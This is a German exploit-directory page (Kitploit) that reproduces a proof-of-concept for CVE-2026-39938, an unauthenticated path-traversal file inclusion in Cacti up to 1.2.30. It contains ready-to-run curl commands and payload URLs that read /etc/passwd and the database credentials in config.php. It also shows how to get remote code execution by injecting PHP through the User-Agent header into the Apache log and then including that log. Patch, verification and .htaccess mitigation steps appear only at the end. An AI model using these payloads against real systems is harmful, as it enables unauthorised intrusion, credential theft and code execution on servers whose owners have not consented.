Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Proof-of-Concept-Exploit für CVE-2026-39938: nicht authentifizierte lokale Dateieinbindung in Cacti <= 1.2.30, ermöglicht das Lesen beliebiger Dateien und die Remotecodeausführung durch Log-Poisoning.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

CVE-2026-39938: Cacti <= 1.2.30 - Nicht authentifiziertes LFI

Zusammenfassung

FeldWert
CVE IDCVE-2026-39938
CVSS-Score9.8 (Critical)
Betroffenes ProduktCacti
Betroffene Versionen<= 1.2.30
Gepatchte Version1.2.31
Fix-Commit9871f0c

Details zur Sicherheitslücke

Ursache

Die Schwachstelle befindet sich in lib/rrd.php, wo der Parameter graph_theme direkt ohne Bereinigung verwendet wird:

ANFÄLLIGER CODE:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

GEPATCHTER CODE:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

Das Problem: Keine Validierung gegen ../-Pfad-Traversal-Sequenzen, sodass Angreifer ohne Authentifizierung beliebige Dateien lesen können.


Proof of Concept (PoC) - Einfache Schritte

Schritt 1: Schwachstelle verifizieren – /etc/passwd lesen

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Ergebnis: Inhalt von /etc/passwd wird in der Antwort angezeigt.

Schritt 2: Datenbankkonfiguration lesen

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Ergebnis: Datenbank-Anmeldedaten (Benutzername, Passwort) werden offengelegt.

Schritt 3: Remote-Code-Ausführung durch Log Poisoning

3.1 PHP-Code in Apache-Log injizieren

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Code durch Einbinden der Logdatei ausführen

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Ergebnis: Die Befehlsausgabe (z. B. uid=33(www-data)) wird angezeigt.


Getestete häufige Endpunkte


PoC-URL-Beispiele

Einfacher LFI-Test

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Anwendungskonfiguration lesen

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Log Poisoning (Injection)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

Mit Header: User-Agent: <?php system('id'); ?>

Log Poisoning (Ausführung)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Abhilfe

Auf gepatchte Version aktualisieren

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Patch-Übernahme prüfen

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Temporäre Absicherung (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Referenzen

  • GitHub Security Advisory
  • Patch Commit 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • W.P.E.F Telegram-Kanal #1
  • W.P.E.F Telegram-Kanal #2

Bericht erstellt für Sicherheitsforschungszwecke Datum: 27. Juni 2026

Tool herunterladen
EndpunktParameterBeispiel-Payload
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log